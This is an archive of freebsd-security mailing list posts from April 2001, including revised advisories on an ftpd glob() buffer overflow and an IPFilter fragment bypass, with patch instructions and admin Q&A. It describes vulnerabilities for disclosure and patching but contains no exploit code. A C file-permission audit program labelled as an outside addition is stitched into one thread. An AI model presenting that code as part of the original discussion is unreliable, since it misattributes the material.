SA-01:33/glob.{3,4}.x.patch...

- tatibana

From owner-freebsd-security Thu Apr 19 5:20:16 2001
Date: Thu, 19 Apr 2001 15:18:38 +0300
From: Peter Pentchev
To: Krassimir Slavchev
Cc: freebsd-security@FreeBSD.org
Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob
Message-ID: <20010419151838.B1067@ringworld.oblivion.bg>
References: <200104171909.f3HJ9gH14235@freefall.freebsd.org> <3ADD3F02.D54F692D@bulinfo.net>
In-Reply-To: <3ADD3F02.D54F692D@bulinfo.net>; from krassi@bulinfo.net on Wed, Apr 18, 2001 at 10:15:14AM +0300

On Wed, Apr 18, 2001 at 10:15:14AM +0300, Krassimir Slavchev wrote:
> Hmmm, any ideas?
[snip]
>
> /usr/src/lib/libc/../libc/gen/glob.c: In function `glob':
>
> /usr/src/lib/libc/../libc/gen/glob.c:171: `GLOB_MAXPATH' undeclared (first use in
> this function)

Yes, this is a known problem; the advisory inadvertently went out with
part of the patch omitted.  The advisory shall be reissued, and in the
meantime, you can get the rest of the patch from:

http://people.FreeBSD.org/~roam/misc/glob.h.diff

G'luck,
Peter

--
If this sentence didn't exist, somebody would have invented it.

From owner-freebsd-security Thu Apr 19 5:46:52 2001
From: Darren Reed
Message-Id: <200104191246.WAA14999@caligula.anu.edu.au>
Subject: Re: non-random IP IDs
To: geniusj@bluenugget.net (Jason DiCioccio)
Date: Thu, 19 Apr 2001 22:46:19 +1000 (Australia/ACT)
Cc: avalon@coombs.anu.edu.au (Darren Reed), bright@wintelcom.net (Alfred Perlstein), freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG
In-Reply-To: <004201c0c783$7fe71df0$4904a8c0@epylon.lan> from "Jason DiCioccio" at Apr 17, 2001 02:15:15 PM

In some mail from Jason DiCioccio, sie said:
>
> From: "Darren Reed"
> Subject: Re: non-random IP IDs
>
> > How long has your box been up ? How many changes to the system config
> > have been made since then ? If you're not there, and it reboots, will
> > it come up 100% functional ? Do your computers need some amount of
> > preventative maintenance like internal cleaning to deal with dust build
> > up, etc ?
>
> I don't know very many if any people that take their machines off the rack
> just to clean dust out of the case.
>
> > How many times do unscheduled reboots result in hardware not
> > spinning back up and at an inconvenient time ?
>
> This would happen regardless of when/if you rebooted it.

If you plan for these events (usually outside business hours) then it is
generally less painful to deal with them.

[...]
> > None of my personal boxes have uptimes that ever exceed 6 months, even my
> > servers, but I have complete confidence in them rebooting and services being
> > restarted (modulo file system damage from an unclean shutdown).
>
> softupdates should take care of this, and as far as HD trouble, if your
> system is really that important then mirror your disks.

Really ?

Darren

From owner-freebsd-security Thu Apr 19 6:11: 5 2001
Subject: promiscuous mode
To: freebsd-security@freebsd.org
From: George.Giles@mcmail.vanderbilt.edu
Date: Thu, 19 Apr 2001 08:10:45 -0500

I have a 4.2-RELEASE box that is going into, and out of, promiscuous mode
on the xl0 interface. What would cause this ? Is it a sign of a potential
problem ?

George

From owner-freebsd-security Thu Apr 19 6:17: 7 2001
Date: Thu, 19 Apr 2001 16:15:03 +0300
From: Peter Pentchev
To: George.Giles@mcmail.vanderbilt.edu
Cc: freebsd-security@freebsd.org
Subject: Re: promiscuous mode
Message-ID: <20010419161503.A1527@ringworld.oblivion.bg>
In-Reply-To: from George.Giles@mcmail.vanderbilt.edu on Thu, Apr 19, 2001 at 08:10:45AM -0500

On Thu, Apr 19, 2001 at 08:10:45AM -0500, George.Giles@mcmail.vanderbilt.edu wrote:
> I have a 4.2-RELEASE box that is going into, and out of, promiscuous mode
> on the xl0 interface. What would cause this ? Is it a sign of a potential
> problem ?

'Promiscuous mode' means that the kernel starts processing - and passing
to userland programs - ethernet frames that are not targeted to this
machine only.  This means somebody (usu. root ;) is running a packet
capture program - either tcpdump, or some traffic analysis utility, or -
if none of the above - possibly a packet sniffer.  In the last case, you
should be alarmed.

If you are not running tcpdump or some traffic analysis program, or if
there are times that you are not running those, but the interface still
goes into or out of promiscuous mode, then yes, this is a sign of a
potential intrusion.

G'luck,
Peter

--
I am the thought you are now thinking.

From owner-freebsd-security Thu Apr 19 6:19: 6 2001
Date: Thu, 19 Apr 2001 06:16:43 -0700
From: Alfred Perlstein
To: George.Giles@mcmail.vanderbilt.edu
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: promiscuous mode
Message-ID: <20010419061643.I976@fw.wintelcom.net>
In-Reply-To: from George.Giles@mcmail.vanderbilt.edu on Thu, Apr 19, 2001 at 08:10:45AM -0500
X-all-your-base: are belong to us.

* George.Giles@mcmail.vanderbilt.edu [010419 06:11] wrote:
> I have a 4.2-RELEASE box that is going into, and out of, promiscuous mode
> on the xl0 interface. What would cause this ? Is it a sign of a potential
> problem ?

If you're the admin and no one else should be running the network
interface in this mode it's a sign of a compromise of security, mainly
that your box may be compromised.

Just make sure you're not seeing this because of things that need
promiscuous mode like dhcpd and various network monitoring tools such
as tcpdump.

--
-Alfred Perlstein - [alfred@freebsd.org]
Instead of asking why a piece of software is using "1970s technology,"
start asking why software is ignoring 30 years of accumulated wisdom.

From owner-freebsd-security Thu Apr 19 6:53:58 2001
Subject: more on promiscuity
To: freebsd-security@freebsd.org
From: George.Giles@mcmail.vanderbilt.edu
Date: Thu, 19 Apr 2001 08:52:50 -0500

Ntop, I assume, will enable ?
How do I disable once it is enabled ?

George

From owner-freebsd-security Thu Apr 19 6:55:15 2001
Date: Thu, 19 Apr 2001 15:55:10 +0200
From: Szilveszter Adam
To: freebsd-security@freebsd.org
Subject: Re: more on promiscuity
Message-ID: <20010419155510.B23800@petra.hos.u-szeged.hu>
In-Reply-To: from George.Giles@mcmail.vanderbilt.edu on Thu, Apr 19, 2001 at 08:52:50AM -0500

On Thu, Apr 19, 2001 at 08:52:50AM -0500, George.Giles@mcmail.vanderbilt.edu wrote:
> Ntop, I assume, will enable ?
> How do I disable once it is enabled ?
>
> George

Quit ntop?:-)

--
Regards:

Szilveszter ADAM
Szeged University
Szeged Hungary

From owner-freebsd-security Thu Apr 19 6:55:41 2001
Date: Thu, 19 Apr 2001 09:55:37 -0400
From: Chris Faulhaber
To: George.Giles@mcmail.vanderbilt.edu
Cc: freebsd-security@freebsd.org
Subject: Re: more on promiscuity
Message-ID: <20010419095536.B81766@peitho.fxp.org>
In-Reply-To: from George.Giles@mcmail.vanderbilt.edu on Thu, Apr 19, 2001 at 08:52:50AM -0500

On Thu, Apr 19, 2001 at 08:52:50AM -0500, George.Giles@mcmail.vanderbilt.edu wrote:
> Ntop, I assume, will enable ?
> How do I disable once it is enabled ?
>

It will be disabled when the program terminates (you should have both
enabled and disabled entries in your logs)

--
Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
--------------------------------------------------------
FreeBSD: The Power To Serve - http://www.FreeBSD.org

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: FreeBSD: The Power To Serve
-----END PGP SIGNATURE-----

From owner-freebsd-security Thu Apr 19 7:58:49 2001
Message-ID: <3ADEFE00.812EA0A3@gmx.net>
Date: Thu, 19 Apr 2001 11:02:24 -0400
From: Raoul Schroeder
To: Kris Kennaway
Cc: fukuda shinichi, freebsd-security@FreeBSD.ORG
Subject: Re: unknown process
References: <200104190241.AA00733@fukuda.alles.ad.jp> <20010418200223.A42227@xor.obsecurity.org>

>
> Take your system off the net and check it for signs of intrusion.
>
> Kris

Just a quick question: How does one check for signs of intrusion. The FreeBSD
handbook does not really talk a lot about this.
Is there a good documentation about this?

Thank you

Raoul

From owner-freebsd-security Thu Apr 19 8:41:50 2001
X-URL: http://www.ofug.org/~des/
To: Raoul Schroeder
Cc: Kris Kennaway, fukuda shinichi, freebsd-security@FreeBSD.ORG
Subject: Re: unknown process
References: <200104190241.AA00733@fukuda.alles.ad.jp> <20010418200223.A42227@xor.obsecurity.org> <3ADEFE00.812EA0A3@gmx.net>
From: Dag-Erling Smorgrav
Date: 19 Apr 2001 17:41:46 +0200
In-Reply-To: Raoul Schroeder's message of "Thu, 19 Apr 2001 11:02:24 -0400"

Raoul Schroeder writes:
> Just a quick question: How does one check for signs of intrusion. The FreeBSD
> handbook does not really talk a lot about this.
> Is there a good documentation about this?

http://www.porcupine.org/

DES
--
Dag-Erling Smørgrav - des@thinksec.com

From owner-freebsd-security Thu Apr 19 8:45:35 2001
Message-ID: <3ADF0819.B5882BE1@DougBarton.net>
Date: Thu, 19 Apr 2001 08:45:29 -0700
From: Doug Barton
Organization: Triborough Bridge & Tunnel Authority
To: Gerhard Sittig
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: /root and users home dir permissions
References: <20010418173927.A64529@icon.icon.bg> <20010418210425.S20830@speedy.gsinet>

Gerhard Sittig wrote:
>
> On Wed, Apr 18, 2001 at 17:39 +0300, Victor Ivanov wrote:
> >
> > I noticed /root is installed with mode=0755 (and updated every
> > time by installworld). It's the root home directory... some
> > admins (like me) are using it for keeping sensitive data away
> > from regular users. Shouldn't it be mode=0700 in
> > /etc/mtree/BSD.root.dist?
>
> a+rx on /root only means that this very directory can be listed
> and entered by anybody.  There might be valid reasons for doing
> this . . .
> What keeps you from putting sensitive data into a directory one
> level deeper?

I agree. 755 for home dirs has a long standing tradition behind it, and
is very useful in shared environments. Anything that needs to be hidden
can be, in /root or elsewhere.

Doug
--
"One thing they don't tell you about doing experimental physics is that
sometimes you must work under adverse conditions ... like a state of
sheer terror."
-- W. K. Hartmann
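As an added illustration of Gerhard's point (example code, not from the thread or from FreeBSD): a small audit that walks a home directory and lists the regular files another unprivileged user could actually read, treating any directory without o+x as a wall that hides everything beneath it. The function names, the fixture layout and the thresholds are this example's own assumptions.

```c
/* exposed_files.c: which files under a 0755 home can other users actually read?
 * Added example, not from the thread or from FreeBSD.  A file is reachable by
 * an arbitrary other user only if it is world-readable AND every directory on
 * the path below the home is world-searchable (o+x); a 0700 directory one
 * level down therefore hides everything beneath it, which is Gerhard's point. */
#define _XOPEN_SOURCE 700
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

/* Recursively count (and print) regular files under `dir` that a user who is
 * neither the owner nor in the group could read.  The walk checks the o+x bit
 * of `dir` itself first; callers pass the home directory.  Returns -1 on error. */
int count_exposed(const char *dir)
{
    struct stat st;
    if (lstat(dir, &st) != 0 || !S_ISDIR(st.st_mode))
        return -1;
    /* Without o+x nobody else can traverse this directory, so nothing
     * below it is exposed no matter what modes the contents carry. */
    if ((st.st_mode & S_IXOTH) == 0)
        return 0;

    DIR *d = opendir(dir);
    if (d == NULL)
        return -1;

    int exposed = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        if (strcmp(e->d_name, ".") == 0 || strcmp(e->d_name, "..") == 0)
            continue;
        char path[1024];
        snprintf(path, sizeof path, "%s/%s", dir, e->d_name);
        if (lstat(path, &st) != 0)
            continue;                       /* vanished or unreadable: skip */
        if (S_ISDIR(st.st_mode)) {
            int sub = count_exposed(path);
            if (sub > 0)
                exposed += sub;
        } else if (S_ISREG(st.st_mode) && (st.st_mode & S_IROTH)) {
            printf("exposed: %s\n", path);
            exposed++;
        }
    }
    closedir(d);
    return exposed;
}

static int make_file(const char *path, mode_t mode)
{
    FILE *fp = fopen(path, "w");
    if (fp == NULL)
        return -1;
    fclose(fp);
    return chmod(path, mode);               /* override the umask explicitly */
}

/* Constructed home directory for the demo (hypothetical layout):
 *   home/            0755   like /root as installed by installworld
 *   home/notes       0644   readable by everyone        -> exposed
 *   home/private/    0700   the "one level deeper" directory
 *   home/private/key 0644   open mode, but unreachable  -> hidden
 *   home/pub/        0755
 *   home/pub/draft   0600   reachable dir, unreadable   -> hidden
 * The created path is copied into `out`; returns 0 on success. */
int make_fixture(char *out, size_t outsz)
{
    char tmpl[] = "/tmp/homeXXXXXX";
    char path[1024];
    if (mkdtemp(tmpl) == NULL || chmod(tmpl, 0755) != 0)
        return -1;
    snprintf(out, outsz, "%s", tmpl);

    snprintf(path, sizeof path, "%s/notes", tmpl);
    if (make_file(path, 0644) != 0) return -1;
    snprintf(path, sizeof path, "%s/private", tmpl);
    if (mkdir(path, 0700) != 0 || chmod(path, 0700) != 0) return -1;
    snprintf(path, sizeof path, "%s/private/key", tmpl);
    if (make_file(path, 0644) != 0) return -1;
    snprintf(path, sizeof path, "%s/pub", tmpl);
    if (mkdir(path, 0755) != 0 || chmod(path, 0755) != 0) return -1;
    snprintf(path, sizeof path, "%s/pub/draft", tmpl);
    return make_file(path, 0600);
}

int main(void)
{
    char home[64];
    if (make_fixture(home, sizeof home) != 0) {
        perror("fixture");
        return 1;
    }
    int n = count_exposed(home);
    printf("%d file(s) under %s readable by other users\n", n, home);
    return n < 0;
}
```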

From owner-freebsd-security Thu Apr 19 8:50:15 2001
Date: Thu, 19 Apr 2001 11:49:52 -0400 (EDT)
From: Michael S Scheidell
Message-Id: <200104191549.f3JFnqF74867@caerulus.cerintha.com>
To: memphis_ms@gmx.net
Cc: freebsd-security@freebsd.org
Subject: Re: unknown process
In-Reply-To: <3ADEFE00.812EA0A3@gmx.net>
References: <200104190241.AA00733@fukuda.alles.ad.jp> <20010418200223.A42227@xor.obsecurity.org> <3ADEFE00.812EA0A3@gmx.net>
Reply-To: scheidell@fdma.com

In local.freebsd.security, you wrote:
>>
>> Take your system off the net and check it for signs of intrusion.
>>
>> Kris
>
>Just a quick question: How does one check for signs of intrusion. The FreeBSD
>handbook does not really talk a lot about this.
>Is there a good documentation about this?
>

see my sig below:

--
Michael Scheidell
Florida Datamation, Inc.
scheidell@fdma.com  1+(561) 368-9561
Internet Security and Consulting
See updated IT Security News at http://www.fdma.com/
After system Compromise : http://www.cert.org/tech_tips/

From owner-freebsd-security Thu Apr 19 9:36:46 2001
Date: Thu, 19 Apr 2001 11:39:01 -0500 (COT)
From: Buliwyf McGraw
To: security@FreeBSD.ORG
Subject: maxusers

Hi, I'm recompiling the kernel of my server, because I need more ptys.
I set the maxusers var to 1024; when I do the config I get this:

[117][11:25][Xr00t]%config CROW
warning: maxusers > 512 (1024)
Don't forget to do a ``make depend''

Is that warning about security or some risk for the system?

Thanks.

=======================================================================
Buliwyf McGraw
Administrator of the Libertad server
Centro de Servicios de Informacion
Universidad del Valle
=======================================================================

From owner-freebsd-security Thu Apr 19 9:45:48 2001
Message-ID: <00e201c0c8f0$7aa95d80$4904a8c0@epylon.lan>
From: "Jason DiCioccio"
To: "Buliwyf McGraw"
Subject: Re: maxusers
Date: Thu, 19 Apr 2001 09:47:53 -0700

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

pseudo-device pty 256

and then do your MAKEDEVs...  256 is the max amount of ptys you'll get :)

Cheers,
-JD-

----- Original Message -----
From: "Buliwyf McGraw"
Sent: Thursday, April 19, 2001 9:39 AM
Subject: maxusers

>
> Hi, I'm recompiling the kernel of my server, because I need more ptys.
> I set the maxusers var to 1024; when I do the config I get this:
>
> [117][11:25][Xr00t]%config CROW
> warning: maxusers > 512 (1024)
> Don't forget to do a ``make depend''
>
> Is that warning about security or some risk for the system?
>
> Thanks.
>
> =======================================================================
> Buliwyf McGraw
> Administrator of the Libertad server
> Centro de Servicios de Informacion
> Universidad del Valle
> =======================================================================
>

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use
-----END PGP SIGNATURE-----

From owner-freebsd-security Thu Apr 19 10:49:17 2001
X-URL: http://www.ofug.org/~des/
To: Buliwyf McGraw
Cc: security@FreeBSD.ORG
Subject: Re: maxusers
From: Dag-Erling Smorgrav
Date: 19 Apr 2001 19:48:42 +0200

Buliwyf McGraw writes:
> Hi, I'm recompiling the kernel of my server, because I need more ptys.
> I set the maxusers var to 1024; when I do the config I get this:

There is no relation between maxusers and the number of ptys
available.  In fact, there is practically no relation between maxusers
and anything of interest in the kernel.  I believe the only value
affected by maxusers that can't be tuned at boot- or run-time is the
maximum size of the process table.

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Thu Apr 19 10:58: 1 2001
Message-ID: <3ADF2757.DF2C0A88@packeteer.com>
Date: Thu, 19 Apr 2001 10:58:47 -0700
From: Brian Tiemann
Organization: Packeteer, Inc.
To: security@freebsd.org
Subject: Re: maxusers

On 19 Apr 2001, Dag-Erling Smorgrav wrote:
> There is no relation between maxusers and the number of ptys
> available.  In fact, there is practically no relation between maxusers
> and anything of interest in the kernel.  I believe the only value
> affected by maxusers that can't be tuned at boot- or run-time is the
> maximum size of the process table.

Would it be a horrible idea to change the name of the key in the config
file? Maybe to something less likely to cause this (very common and
understandable) error-- like, say, RSRCLIM (resource limit)?

Brian

From owner-freebsd-security Thu Apr 19 12:12:10 2001
Date: Thu, 19 Apr 2001 12:11:55 -0700 (PDT)
Message-Id: <200104191911.f3JJBt338327@freefall.freebsd.org>
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob [REVISED]
Reply-To: security-advisories@FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:33                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          globbing vulnerability in ftpd [REVISED]

Category:       core
Module:         ftpd/libc
Announced:      2001-04-17
Revised:        2001-04-19
Credits:        John McDonald and Anthony Osborne, COVERT Labs
Affects:        FreeBSD 3.x (all releases), FreeBSD 4.x (all releases),
                FreeBSD 3.5-STABLE and 4.3-RC prior to the correction date.
Corrected:      2001-04-17 (FreeBSD 4.3-RC)
                2001-04-17 (FreeBSD 3.5-STABLE)
Vendor status:  Corrected
FreeBSD only:   NO

0.   Revision History

2001-04-17  v1.0  Initial release
2001-04-19  v1.1  Corrected patch and patch instructions

I.   Background

Numerous FTP daemons, including the daemon distributed with FreeBSD, use
server-side globbing to expand pathnames via user input. This globbing is
performed by FreeBSD's glob() implementation in libc.

II.  Problem Description

The glob() function contains potential buffer overflows that may be
exploitable through the FTP daemon. If a directory with a name of a
certain length is present, a remote user specifying a pathname using
globbing characters may cause arbitrary code to be executed on the FTP
server as the user running ftpd, usually root.

Additionally, when given a path containing numerous globbing characters,
the glob() functions may consume significant system resources when
expanding the path. This can be controlled by setting user limits via
/etc/login.conf and setting limits on globbing expansion.

All versions of FreeBSD prior to the correction date, including FreeBSD
3.5.1 and 4.2, contain this problem. The base system that will ship with
FreeBSD 4.3 does not contain this problem since it was corrected before
the release.

III. Impact

Remote users may be able to execute arbitrary code on the FTP server as
the user running ftpd, usually root.

The FTP daemon supplied with FreeBSD is enabled by default to allow
access to authorized local users and not anonymous users, thus limiting
the impact to authorized local users.

IV.  Workaround

If the FTP daemon is executed from inetd, disable the FTP daemon by
commenting out the ftp line in /etc/inetd.conf, then reload the inetd
configuration by executing the following command as root:

# killall -HUP inetd

V.   Solution

One of the following:

1) Upgrade to FreeBSD 4.3-RC or 3.5.1-STABLE after the correction date.

2) Download the patch and detached PGP signature from the following
location:

The following patch applies to FreeBSD 4.x:

# fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.4.x.patch
# fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.4.x.patch.asc

The following patch applies to FreeBSD 3.x:

# fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.3.x.patch
# fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.3.x.patch.asc

Verify the detached signature using your PGP utility.

Issue the following commands as root:

# cd /usr/src
# patch -p < /path/to/patch
# cp /usr/src/include/glob.h /usr/include/
# cd /usr/src/lib/libc
# make all install
# cd /usr/src/libexec/ftpd
# make all install

If the FTP daemon is running standalone, it will have to be manually
stopped and restarted.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOt83elUuHi5z0oilAQGvLwP+Mg6yScJhgTuGnJ1037opvwPEbKb0JWF4
CuC8lKB0xV3BMQhQ8BRC3RVJWptFDv8qlWxW7kCyiuYk19oS8IUsllvwD6uftHZI
iph5TF3F37DNiE2lEp4T5/VSPqkEaYoV0Iu9+S43V7M2dPWVPS4tziPQamtBupdQ
OhsFSsEGgVU=
=AV6T
-----END PGP SIGNATURE-----

From owner-freebsd-security Thu Apr 19 12:21: 7 2001
Date: Thu, 19 Apr 2001 14:20:01 -0500 (CDT)
From: Chris Byrnes
Subject: RE: Security, glob FTP, new fix

awww# make all install
cc -O -pipe -DSETPROCTITLE -DSKEY -DLOGIN_CAP -DVIRTUAL_HOSTING -Wall -DINET6 -Dmain=ls_main -I/usr/src/libexec/ftpd/../../bin/ls -c /usr/src/libexec/ftpd/ftpd.c
/usr/src/libexec/ftpd/ftpd.c: In function `send_file_list':
/usr/src/libexec/ftpd/ftpd.c:2645: warning: variable `dout' might be clobbered by `longjmp' or `vfork'
/usr/src/libexec/ftpd/ftpd.c:2646: warning: variable `dirlist' might be clobbered by `longjmp' or `vfork'
/usr/src/libexec/ftpd/ftpd.c:2647: warning: variable `simple' might be clobbered by `longjmp' or `vfork'
/usr/src/libexec/ftpd/ftpd.c:2648: warning: variable `freeglob' might be clobbered by `longjmp' or `vfork'
yacc -o ftpcmd.c /usr/src/libexec/ftpd/ftpcmd.y
cc -O -pipe -DSETPROCTITLE -DSKEY -DLOGIN_CAP -DVIRTUAL_HOSTING -Wall -DINET6 -Dmain=ls_main -I/usr/src/libexec/ftpd/../../bin/ls -c ftpcmd.c
/usr/src/libexec/ftpd/ftpcmd.y: In function `yyparse':
/usr/src/libexec/ftpd/ftpcmd.y:933: `GLOB_MAXPATH' undeclared (first use in this function)
/usr/src/libexec/ftpd/ftpcmd.y:933: (Each undeclared identifier is reported only once
/usr/src/libexec/ftpd/ftpcmd.y:933: for each function it appears in.)
*** Error code 1

Stop in /usr/src/libexec/ftpd.
awww#

Still broken.

Chris Byrnes, chris@JEAH.net
JEAH Communications, http://www.JEAH.net
608.244.9525 (Toll), 1.866.AWW.JEAH (Toll-Free)

From owner-freebsd-security Thu Apr 19 12:24:15 2001
Date: Thu, 19 Apr 2001 12:23:53 -0700 (PDT)
Message-Id: <200104191923.f3JJNrP39589@freefall.freebsd.org>
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory FreeBSD-SA-01:32.ipfilter [REVISED]
Reply-To: security-advisories@FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:32                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          IPFilter may incorrectly pass packets [REVISED]

Category:       core
Module:         IPFilter
Announced:      2001-04-16
Revised:        2001-04-19
Credits:        Thomas Lopatic
Affects:        FreeBSD 3.x (all releases), FreeBSD 4.x (all releases),
                FreeBSD 3.5-STABLE, and 4.2-STABLE prior to the correction date.
Corrected:      2001-04-07 (FreeBSD 4.2-STABLE)
Vendor status:  Corrected
FreeBSD only:   NO

0.   Revision History

v1.0  2001-04-16  Initial release
v1.1  2001-04-19  Corrected patch location

I.   Background

IPFilter is a multi-platform packet filtering package.

II.  Problem Description

When matching a packet fragment, insufficient checks were performed to
ensure the fragment is valid. In addition, the fragment cache is checked
before any rules are checked. Even if all fragments are blocked with a
rule, fragment cache entries can be created by packets that match
currently held state information. Because of these discrepancies,
certain packets may bypass filtering rules.

All versions of FreeBSD prior to the correction date, including FreeBSD
3.5.1 and 4.2, contain this problem. The base system that will ship with
FreeBSD 4.3 does not contain this problem since it was corrected during
the beta cycle before the release.

III. Impact

Malicious remote users may be able to bypass filtering rules, allowing
them to potentially circumvent the firewall.

IPFilter is not enabled by default. If you have not enabled IPFilter,
your system is not vulnerable to this problem.

IV.  Workaround

Since fragment cache matching occurs before filtering rules checking, it
is not possible to work around this problem using IPFilter rules.

V.   Solution

[FreeBSD 3.x]

Due to the age of the IPFilter package shipped with FreeBSD 3.x, it is
recommended that FreeBSD 3.x systems update to IPFilter 3.4.17 using the
package available from the author's website:

http://coombs.anu.edu.au/~avalon/ip-filter.html

[FreeBSD 4.x]

One of the following:

1) Upgrade to FreeBSD 4.2-STABLE after the correction date.

2) Download the patch and detached PGP signature from the following
location:

The following patch applies to FreeBSD 4.1-RELEASE through 4.2-STABLE.

# fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:32/ipfilter.patch
# fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:32/ipfilter.patch.asc

Verify the detached signature using your PGP utility.

Issue the following commands as root:

# cd /usr/src
# patch -p < /path/to/patch

If the system is using ipfilter as a kernel module, the module may be
rebuilt and installed and ipfilter rules reloaded with the following
commands:

# cd /usr/src/sys/modules/ipfilter
# make all install
# kldunload ipl && kldload ipf && ipf -Fa -f /etc/ipf.rules

Otherwise, if ipfilter is compiled into the kernel, a new kernel will need
to be compiled and installed and the system will have to be rebooted for
the changes to take effect.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOt860lUuHi5z0oilAQF3YAP/QjuLc+e2gGAiuQSxfi9wE5Kw9Q4pYp66
SNFxhz1cvfg/zfCe81bM3+M/GYDAZEqrmWsfvObKXuU+8BCMeJ/C+Jifu+P6hO4K
galMavQ5UTzwnw4lwK4VU/D7zefX5HHOXk0jb/Q6DFs/4KKIFCmGHoBYhuGKbwm0
soEQYwDEAps=
=nkCa
-----END PGP SIGNATURE-----

From owner-freebsd-security Thu Apr 19 12:30:49 2001
Message-ID: <3ADF3CCC.FB8498DC@emre.de>
Date: Thu, 19 Apr 2001 21:30:20 +0200
From: Emre Bastuz
To: freebsd-security@freebsd.org
Subject: Tripwire or the like for FreeBSD ?

Hi,

I was just wondering if there is Tripwire for FreeBSD or some decent tool
that has similar/better functionality ?

The Tripwire homepage seems to be pretty commercial and lacks a BSD
version (they seem to be focused on Linux).

I found something called "Aide" in the ports directory, but to be honest -
I don't trust a "Version 0.7" when it comes to security.

Does anyone know any alternative ?

Regards,

Emre

--
Emre Bastuz
info@emre.de http://www.emre.de
UIN: 561260 PGP Key ID: 0xAFAC77FD

From owner-freebsd-security Thu Apr 19 12:31:12 2001
Date: Thu, 19 Apr 2001 15:31:04 -0400
From: Chris Faulhaber
To: Chris Byrnes
Cc: security@freebsd.org
Subject: Re: Security, glob FTP, new fix
Message-ID: <20010419153104.C81766@peitho.fxp.org>

On Thu, Apr 19, 2001 at 02:20:01PM -0500, Chris Byrnes wrote:
> /usr/src/libexec/ftpd/ftpcmd.y: In function `yyparse':
> /usr/src/libexec/ftpd/ftpcmd.y:933: `GLOB_MAXPATH' undeclared (first use
> in this function)
> /usr/src/libexec/ftpd/ftpcmd.y:933: (Each undeclared identifier is
> reported only once
> /usr/src/libexec/ftpd/ftpcmd.y:933: for each function it appears in.)
> *** Error code 1
>

Did you copy the patched /usr/src/include/glob.h to /usr/include/
like the revised advisory states?

--
Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
--------------------------------------------------------
FreeBSD: The Power To Serve - http://www.FreeBSD.org

From owner-freebsd-security Thu Apr 19 12:33:14 2001
Date: Thu, 19 Apr 2001 14:32:09 -0500 (CDT)
From: Chris Byrnes
To: Chris Faulhaber
Subject: Re: Security, glob FTP, new fix
In-Reply-To: <20010419153104.C81766@peitho.fxp.org>

indeed i did

Chris Byrnes, chris@JEAH.net
JEAH Communications, http://www.JEAH.net
608.244.9525 (Toll), 1.866.AWW.JEAH (Toll-Free)

On Thu, 19 Apr 2001, Chris Faulhaber wrote:

> On Thu, Apr 19, 2001 at 02:20:01PM -0500, Chris Byrnes wrote:
> > /usr/src/libexec/ftpd/ftpcmd.y: In function `yyparse':
> > /usr/src/libexec/ftpd/ftpcmd.y:933: `GLOB_MAXPATH' undeclared (first use
> > in this function)
> > /usr/src/libexec/ftpd/ftpcmd.y:933: (Each undeclared identifier is
> > reported only once
> > /usr/src/libexec/ftpd/ftpcmd.y:933: for each function it appears in.)
> > *** Error code 1
> >
>
> Did you copy the patched /usr/src/include/glob.h to /usr/include/
> like the revised advisory states?
>
> --
> Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
> --------------------------------------------------------
> FreeBSD: The Power To Serve - http://www.FreeBSD.org
>

From owner-freebsd-security Thu Apr 19 12:33:24 2001
Date: Thu, 19 Apr 2001 12:33:00 -0700
From: Erick Mechler
To: Emre Bastuz
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Tripwire or the like for FreeBSD ?
Message-ID: <20010419123300.E73738@techometer.net>
In-Reply-To: <3ADF3CCC.FB8498DC@emre.de>

Ports are your friend: /usr/ports/security/tripwire...

See http://www.freebsd.org/doc/en_US.ISO_8859-1/books/handbook/ports.html
for more info on how to use the ports collection.

--Erick

At Thu, Apr 19, 2001 at 09:30:20PM +0200, Emre Bastuz said this:
:: Hi,
::
:: I was just wondering if there is Tripwire for FreeBSD or some decent tool
:: that has similar/better functionality ?
::
:: The Tripwire homepage seems to be pretty commercial and lacks a BSD
:: version (they seem to be focused on Linux).
::
:: I found something called "Aide" in the ports directory, but to be honest -
:: I don't trust a "Version 0.7" when it comes to security.
::
:: Does anyone know any alternative ?
::
:: Regards,
::
:: Emre
::
:: --
:: Emre Bastuz
:: info@emre.de http://www.emre.de
:: UIN: 561260 PGP Key ID: 0xAFAC77FD
::

From owner-freebsd-security Thu Apr 19 12:43:14 2001
Date: Thu, 19 Apr 2001 15:43:08 -0400
From: Chris Faulhaber
To: Chris Byrnes
Cc: security@freebsd.org
Subject: Re: Security, glob FTP, new fix
Message-ID: <20010419154308.D81766@peitho.fxp.org>
References: <20010419153104.C81766@peitho.fxp.org>

